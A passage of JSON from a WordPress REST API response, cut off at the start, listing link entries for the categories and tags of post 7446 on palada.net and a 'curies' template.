php\/wp-json\/wp\/v2\/categories?post=7446"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=7446"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}